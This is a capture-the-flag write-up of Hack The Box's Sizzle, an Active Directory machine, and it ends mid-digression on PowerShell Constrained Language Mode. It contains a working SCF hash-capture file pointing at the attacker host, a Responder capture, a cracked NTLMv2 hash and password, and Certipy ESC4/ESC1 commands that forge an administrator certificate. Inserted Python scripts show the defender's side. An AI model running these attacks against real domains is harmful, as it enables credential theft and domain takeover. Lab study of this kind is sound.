
HTB Sizzle - Windows

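An Insane-difficulty box, solved here via an unintended path. Enumerate share directory permissions to mount an SCF attack over SMB, use the certificate authority (CA) service on the domain controller (DC) to get WinRM access, then abuse a certificate template misconfiguration to go straight to SYSTEM.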

HTB:

Sizzle is an "Insane" difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for PSRemoting. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.

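This box is somewhat dated by now, but I ran into a lot of problems while escalating privileges through ADCS template injection, and I learned many things that were new to me. If you spot any descriptive or technical errors, please point them out.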

Information Gathering

nmap

$ nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.26s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
5986/tcp  open  wsmans
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
49688/tcp open  unknown
49689/tcp open  unknown
49692/tcp open  unknown
49695/tcp open  unknown
49710/tcp open  unknown
49714/tcp open  unknown
49740/tcp open  unknown
$ nmap -sU --top-ports 500 -oA nmapscan/udp 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.25s latency).
Not shown: 496 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap
$ nmap -sT -sC -sV -O -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49669,49671,49688,49689,49692,49695,49710,49714 -oA nmapscan/detail 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.45s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2026-03-17T07:08:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
|_ssl-date: 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after:  2022-02-11T12:59:51
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016|2008|7 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 
|_  start_date: 
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We now have the domain name, so add it to the hosts file:

10.129.6.66 sizzle.htb.local htb.local SIZZLE

smb

List the SMB shares:

$ smbclient -L '//10.129.6.66/'  -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	CertEnroll      Disk      Active Directory Certificate Services share
	Department Shares Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Operations      Disk      
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Look inside Department Shares:

$ smbclient '//10.129.6.66/Department Shares' -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul  3 23:22:32 2018
  ..                                  D        0  Tue Jul  3 23:22:32 2018
  Accounting                          D        0  Tue Jul  3 03:21:43 2018
  Audit                               D        0  Tue Jul  3 03:14:28 2018
  Banking                             D        0  Tue Jul  3 23:22:39 2018
  CEO_protected                       D        0  Tue Jul  3 03:15:01 2018
  Devops                              D        0  Tue Jul  3 03:19:33 2018
  Finance                             D        0  Tue Jul  3 03:11:57 2018
  HR                                  D        0  Tue Jul  3 03:16:11 2018
  Infosec                             D        0  Tue Jul  3 03:14:24 2018
  Infrastructure                      D        0  Tue Jul  3 03:13:59 2018
  IT                                  D        0  Tue Jul  3 03:12:04 2018
  Legal                               D        0  Tue Jul  3 03:12:09 2018
  M&A                                 D        0  Tue Jul  3 03:15:25 2018
  Marketing                           D        0  Tue Jul  3 03:14:43 2018
  R&D                                 D        0  Tue Jul  3 03:11:47 2018
  Sales                               D        0  Tue Jul  3 03:14:37 2018
  Security                            D        0  Tue Jul  3 03:21:47 2018
  Tax                                 D        0  Tue Jul  3 03:16:54 2018
  Users                               D        0  Wed Jul 11 05:39:32 2018
  ZZ_ARCHIVE                          D        0  Wed Mar 18 15:25:04 2026

		7779839 blocks of size 4096. 3764087 blocks available

List all files recursively:

smb: \> recurse ON
smb: \> ls

Users contains some usernames:

\Users
  .                                   D        0  Wed Jul 11 05:39:32 2018
  ..                                  D        0  Wed Jul 11 05:39:32 2018
  amanda                              D        0  Tue Jul  3 03:18:43 2018
  amanda_adm                          D        0  Tue Jul  3 03:19:06 2018
  bill                                D        0  Tue Jul  3 03:18:28 2018
  bob                                 D        0  Tue Jul  3 03:18:31 2018
  chris                               D        0  Tue Jul  3 03:19:14 2018
  henry                               D        0  Tue Jul  3 03:18:39 2018
  joe                                 D        0  Tue Jul  3 03:18:34 2018
  jose                                D        0  Tue Jul  3 03:18:53 2018
  lkys37en                            D        0  Wed Jul 11 05:39:04 2018
  morgan                              D        0  Tue Jul  3 03:18:48 2018
  mrb3n                               D        0  Tue Jul  3 03:19:20 2018
  Public                              D        0  Tue Jul  3 03:19:14 2018

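Extracting these usernames and running kerbrute shows only one valid user, amanda. I tried an ASREPRoasting attack, but GetNPUsers.py reported a network timeout, which is probably because the target only exposes port 88 over UDP. I tried modifying GetNPUsers, but in the end it turned out that amanda does not have pre-authentication disabled.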

ZZ_ARCHIVE contains a lot of files:

\ZZ_ARCHIVE
  .                                   D        0  Wed Mar 18 15:25:04 2026
  ..                                  D        0  Wed Mar 18 15:25:04 2026
  AddComplete.pptx                    A   419430  Tue Jul  3 03:32:58 2018
  AddMerge.ram                        A   419430  Tue Jul  3 03:32:57 2018
  ConfirmUnprotect.doc                A   419430  Tue Jul  3 03:32:57 2018
  ConvertFromInvoke.mov               A   419430  Tue Jul  3 03:32:57 2018
  ConvertJoin.docx                    A   419430  Tue Jul  3 03:32:57 2018
  CopyPublish.ogg                     A   419430  Tue Jul  3 03:32:57 2018
  ...[omitted]...

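Download all of them for local analysis:

smb: \> prompt OFF  # turn off the per-file confirmation prompt
smb: \> lcd /local/path/to/save  # set the local download directory
smb: \> mget ZZ_ARCHIVE   # download the whole directory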

All of the files appear to be corrupted and cannot actually be opened.

FTP

FTP allows anonymous login, but the directory is empty:

$ ftp 10.129.6.66
Connected to 10.129.6.66.
220 Microsoft FTP Service
Name (10.129.6.66:meraki): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||55210|)
150 Opening ASCII mode data connection.
226 Transfer complete.

Web

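Port 80 serves nothing but a picture of a sizzling steak.

Viewing the page source and manually requesting files such as readme.txt turned up nothing.

On to a lengthy directory brute force: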

./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x bak,mdb,aspx,asp,ashx,asmx,svc,config,xml,json,log
./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/Web-Servers/IIS.txt 

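Almost everything returned 404. Only the IIS.txt wordlist turned up a single path, certsrv/. certsrv/ is the web enrollment page provided by Microsoft Active Directory Certificate Services (AD CS). Put simply, it is a website entry point where users request and manage certificates through a browser.

This path requires authentication. It can be brute-forced with tools such as wfuzz.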

$ wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \
      --ntlm "HTB.LOCAL\amanda:FUZZ" \
      --sc 200,403,301,302 \
      -u http://10.129.6.66/certsrv/

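Unfortunately, after a while the server started timing out. Perhaps I needed to tune the number of concurrent threads and add extra wait time, but HTB rarely calls for heavy brute forcing. I noted this down to come back to later if needed.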

LDAP

At this point there is not much attack surface left, so the hope now rests on LDAP. Unfortunately, LDAP requires authentication:

$ nxc ldap sizzle.htb.local -p '' -u '' --users
LDAP        10.129.6.66     389    SIZZLE           [*] Windows 10 / Server 2016 Build 14393 (name:SIZZLE) (domain:HTB.LOCAL) (signing:None) (channel binding:Never)
LDAP        10.129.6.66     389    SIZZLE           [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
LDAP        10.129.6.66     389    SIZZLE           [+] HTB.LOCAL\: 
LDAP        10.129.6.66     389    SIZZLE           [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839

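NTLM Sniffing

What else can be done? One last pass over the SMB directories: if there is a writable directory, a malicious file can be uploaded, and if a user opens it, their hash can be stolen.

Mount the SMB share locally, change into it, and recursively look for writable directories from the current location.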

$ find . -type d -exec sh -c 'mkdir "$1/test_p" 2>/dev/null && { echo "[+] $1"; rmdir "$1/test_p"; }' _ {} \;
[+] ./Users/Public
[+] ./ZZ_ARCHIVE

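Two writable directories were found. Create a file in each of /Users/Public and /ZZ_ARCHIVE, then use the watch command to see whether it gets deleted automatically.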

$ watch -d ls

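It turns out that files under /Users/Public are deleted automatically. That being the case, an SCF file can be used to steal that user's hash.

When Windows Explorer resolves a file's icon, it automatically accesses the path defined in IconFile. If IconFile points to a non-existent SMB path, the system will try to resolve that SMB path, attempting NTLM authentication to the named host in the process.

Upload the prepared SCF file to /Users/Public and start responder at the same time: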

[Shell]
Command=2
IconFile=\\10.10.16.5\share
[Taskbar]
Command=Explorer

/Users/Public $ ls
1.scf
$ sudo responder -I tun0 -wd
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Sponsor this project: [USDT: TNS8ZhdkeiMCT6BpXnj4qPfWo3HpoACJwv] , [BTC: 15X984Qco6bUxaxiR8AmTnQQ5v1LJ2zpNo]

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.5]
    Responder IPv6             [dead:beef:4::1003]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-V8G2WPZMTJC]
    Responder Domain Name      [R828.LOCAL]
    Responder DCE-RPC Port     [47829]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.129.6.66
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:1122334455667788:90063EB83418BD47057394F4933895FA:0101000000000000805C20E1E6B6DC017566B9E53D8D80A60000000002000800520038003200380001001E00570049004E002D005600380047003200570050005A004D0054004A00430004003400570049004E002D005600380047003200570050005A004D0054004A0043002E0052003800320038002E004C004F00430041004C000300140052003800320038002E004C004F00430041004C000500140052003800320038002E004C004F00430041004C0007000800805C20E1E6B6DC0106000400020000000800300030000000000000000100000000200000D22E1D4656A511DC780407CE181584B08CF53E55E4E2C4D34C9B3C7966F081360A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003500000000000000000000000000
[+] Exiting...
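
A defender-side check for the behaviour described above, added here as an example (not code from the original post): it walks a share, parses each .scf file and reports any whose IconFile names a UNC host outside an allow-list. The function names, the allow-list and the sample files in the demo are assumptions constructed for illustration.

```python
import configparser
import os
import re
import tempfile

# \\host\share or //host/share; group 1 is the host part.
UNC_HOST = re.compile(r"^[\\/]{2}([^\\/]+)")


def decode(raw: bytes) -> str:
    """SCF files are small INI-style text; handle UTF-16 saves as well as UTF-8/ANSI."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def icon_host(text: str):
    """Return the UNC host that IconFile in [Shell] points at, or None."""
    ini = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        ini.read_string(text)
    except configparser.Error:
        return None  # not INI-shaped, so there is no IconFile entry to resolve
    for section in ini.sections():
        if section.strip().lower() != "shell":
            continue
        # configparser stores option names lowercased, so IconFile == iconfile.
        match = UNC_HOST.match(ini.get(section, "iconfile", fallback="").strip())
        if match:
            return match.group(1).lower()
    return None


def scan_share(root, trusted_hosts=()):
    """Return sorted (relative path, host) pairs for .scf files with an untrusted UNC icon."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read(64 * 1024)  # real SCF files are tiny
            except OSError:
                continue
            host = icon_host(decode(raw))
            if host and host not in trusted:
                findings.append((os.path.relpath(path, root), host))
    return sorted(findings)


if __name__ == "__main__":
    # Constructed demo: one file shaped like the page's 1.scf (documentation
    # address 192.0.2.10), one pointing at a trusted internal file server.
    with tempfile.TemporaryDirectory() as share:
        os.makedirs(os.path.join(share, "Users", "Public"))
        with open(os.path.join(share, "Users", "Public", "1.scf"), "w") as fh:
            fh.write("[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\n"
                     "[Taskbar]\nCommand=Explorer\n")
        with open(os.path.join(share, "icons.scf"), "w") as fh:
            fh.write("[Shell]\nCommand=2\nIconFile=\\\\fs01\\icons\\app.ico\n")
        for rel, host in scan_share(share, trusted_hosts=["fs01"]):
            print(f"{rel}: IconFile -> \\\\{host}")
```

Run it against a mounted copy of the share. Blocking outbound SMB (TCP 445) from servers and workstations to untrusted networks stops the hash from leaving even when such a file lands in a writable folder.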

Save the hash to a file and crack it:

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

AMANDA::HTB:1122334455667788:90063eb83418bd47057394f4933895fa:0101000000000000805c20e1e6b6dc017566b9e53d8d80a60000000002000800520038003200380001001e00570049004e002d005600380047003200570050005a004d0054004a00430004003400570049004e002d005600380047003200570050005a004d0054004a0043002e0052003800320038002e004c004f00430041004c000300140052003800320038002e004c004f00430041004c000500140052003800320038002e004c004f00430041004c0007000800805c20e1e6b6dc0106000400020000000800300030000000000000000100000000200000d22e1d4656a511dc780407ce181584b08cf53e55e4e2c4d34c9b3c7966f081360a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003500000000000000000000000000:Ashare1972

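Cracked! This gives a set of credentials, amanda:Ashare1972. I tried logging in with evil-winrm, but whether over http or https, evil-winrm returned an authentication error.

Certificates and Keys

The credentials now give access to certsrv/, so we can try logging in to WinRM with a certificate and private key pair. Generate the required files: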

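# generate a 4096-bit RSA private key
$ openssl genrsa -out amanda.key 4096
# create a new certificate signing request (CSR) with the private key
$ openssl req -new -key amanda.key -out amanda.csr

A certificate signing request (CSR) is an encoded file containing the applicant's (e.g. a user's or server's) identifying information (such as the distinguished name) and public key. The applicant signs the file with their own private key to prove possession of that key. The applicant submits the CSR to a certificate authority (CA); after verifying the applicant's identity, the CA uses its own private key to sign the public key and identity information from the CSR, producing a digital certificate. The certificate binds the applicant's identity to their public key, and any relying party can use it to encrypt data or verify signatures.

Browse to /certsrv -> Request a certificate -> advanced certificate request. Paste the contents of amanda.csr into the Saved Request field and submit the request; an amanda.cer file is downloaded.

We now have the two files needed to access WinRM, amanda.cer and amanda.key, and can try logging in:

# certificate-based login requires SSL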
$ evil-winrm -i 10.129.6.66 -c amanda.cer -k amanda.key -S -P 5986
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents> 

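This gives us our first foothold on the target system.

Template Abuse

The target runs certificate services, so try escalating privileges through ADCS certificate template injection. Two tools work well here, Certipy and Certify. Certipy does not need to be uploaded to the target and can be run remotely, so we choose Certipy.

The official documentation describes the usage and the privilege escalation steps in detail.

# find vulnerable configurations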
certipy find -username amanda@HTB.LOCAL -target 10.129.6.66 -dc-ip 10.129.6.66 -p 'Ashare1972' -vulnerable -hide-admins -enabled -stdout
...[omitted]...
[!] Vulnerabilities
     ESC4                              : User has dangerous permissions.

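A template on the target is vulnerable to ESC4 and can be hijacked. Put simply, we can modify its configuration, and such a change can turn an originally secure template into one that is exposed to other attack scenarios, most commonly ESC1 or ESC2.

Following the official documentation, we end up modifying the template configuration to ESC1 and request a certificate for the administrator.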

$ certipy req -username amanda@HTB.LOCAL -target 10.129.6.66 -dc-ip 10.129.6.66 -p 'Ashare1972' -template SSL -ca 'HTB-SIZZLE-CA' -upn 'administrator@htb.local' -sid 'S-1-5-21-2379389067-1826974543-3574127760-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 31
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@htb.local'
[*] Certificate object SID is 'S-1-5-21-2379389067-1826974543-3574127760-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
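
From the CA owner's side, the ESC4-to-ESC1 path above shows up as a template that low-privileged principals can write to and whose name and EKU settings have drifted from a known-good baseline. The check below is an added example, not Certipy's code or anything from the original post; the template name "WebServerCopy", its attribute values and the pre-resolved {principal: rights} ACL format are constructed assumptions, and TIER0 is an assumed list of trusted principals.

```python
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (CA manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "WriteProperty"}
ENROLL_RIGHTS = {"Enroll", "GenericAll"}
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}  # assumption
WATCHED = ("msPKI-Certificate-Name-Flag", "msPKI-Enrollment-Flag",
           "msPKI-RA-Signature", "pKIExtendedKeyUsage")


def low_priv(template, right_names):
    """Principals outside TIER0 that hold any of the given rights on the template."""
    return sorted(p for p, rights in template["acl"].items()
                  if p not in TIER0 and rights & set(right_names))


def esc1_state(template):
    """True when every template-side ESC1 condition holds at once."""
    ekus = template.get("pKIExtendedKeyUsage", [])
    return bool(
        template["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT  # requester names the subject
        and not template["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS       # no manager approval
        and template.get("msPKI-RA-Signature", 0) == 0                      # no authorized signature
        and (not ekus or AUTH_EKUS & set(ekus))                             # usable for logon
        and low_priv(template, ENROLL_RIGHTS)                               # low-priv enrollment
    )


def review(baseline, current):
    """Compare current template snapshots with a trusted baseline; return findings."""
    findings = []
    for name in sorted(current):
        tpl, old = current[name], baseline.get(name)
        writers = low_priv(tpl, WRITE_RIGHTS)
        if writers:
            findings.append((name, "esc4-writable", writers))
        if esc1_state(tpl):
            findings.append((name, "esc1-state", low_priv(tpl, ENROLL_RIGHTS)))
        drift = [k for k in WATCHED if old is not None and old.get(k) != tpl.get(k)]
        if drift:
            findings.append((name, "drift", drift))
    return findings


# Constructed snapshots (not values read from the box on this page).
BASELINE = {"WebServerCopy": {
    "msPKI-Certificate-Name-Flag": 0x02000000,     # subject built from AD (UPN in SAN)
    "msPKI-Enrollment-Flag": 0x0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],  # Server Authentication only
    "acl": {"Domain Admins": {"GenericAll"},
            "Domain Users": {"Enroll", "WriteProperty"}},
}}
# Same template after someone with write access changed it.
CURRENT = {"WebServerCopy": {
    **BASELINE["WebServerCopy"],
    "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
}}
# Corrected ACL: low-privileged users may enroll but not write.
HARDENED = {"WebServerCopy": {
    **BASELINE["WebServerCopy"],
    "acl": {"Domain Admins": {"GenericAll"}, "Domain Users": {"Enroll"}},
}}

if __name__ == "__main__":
    for finding in review(BASELINE, CURRENT):
        print(finding)
```

The baseline itself already carries the esc4-writable finding, which is the condition to fix first: once low-privileged write access is removed, the template cannot be flipped into the ESC1 state.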

Certipy loads the PFX, performs PKINIT to obtain the administrator's Kerberos TGT, and even tries to retrieve the NTLM hash:

$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.6.66'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@htb.local'
[*]     SAN URL SID: 'S-1-5-21-2379389067-1826974543-3574127760-500'
[*] Using principal: 'administrator@htb.local'
[*] Trying to get TGT...

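certipy hangs at the TGT step. Most likely this is because 88/tcp is not open, so the only option now is to upload Rubeus.exe and obtain the TGT and NTLM hash on the target machine.

AppLocker Bypass

Uploading Rubeus.exe reveals that the system has protections in place: the session is in Constrained Language Mode: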

*Evil-WinRM* PS C:\programdata> upload Rubeus.exe
                                        
Info: Uploading /path/Rubeus.exe to C:\programdata\Rubeus.exe
                                        
Error: Upload failed. Check filenames or paths: [WinRM::FS::Core::FileTransporter] Upload failed (exitcode: 0), but stderr present
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:51 char:12
+     return $ExecutionContext.SessionState.Path.GetUnresolvedProviderP ...
+            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
Cannot bind argument to parameter 'Path' because it is null.
At line:19 char:18
+     if(Test-Path $dst -PathType Container) {
+                  ~~~~
    + CategoryInfo          : InvalidData: (:) [Test-Path], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
Cannot bind argument to parameter 'Path' because it is null.
At line:24 char:41
+       chk_exists = ($exists = Test-Path $dst -PathType Leaf)
+                                         ~~~~
    + CategoryInfo          : InvalidData: (:) [Test-Path], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand

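PowerShell's language mode is a security mechanism that determines which language elements and features can be used in the current PowerShell session. Constrained Language Mode came out of both PowerShell's own evolution and security needs.

In the early days (2006 and before), before PowerShell existed, Windows administrators relied mainly on cmd.exe and Windows Script Host (WSH, e.g. VBScript) for automation. These tools had clear shortcomings: weak object handling, complex scripts, and serious security problems (for example, viruses often spread via WSH). Microsoft released PowerShell 1.0 in 2006. Built on the powerful .NET Framework and able to work with objects, it greatly improved administrative efficiency. That same power, however, also made it a target for attackers, who began using PowerShell for fileless attacks, code injection and other malicious activity.

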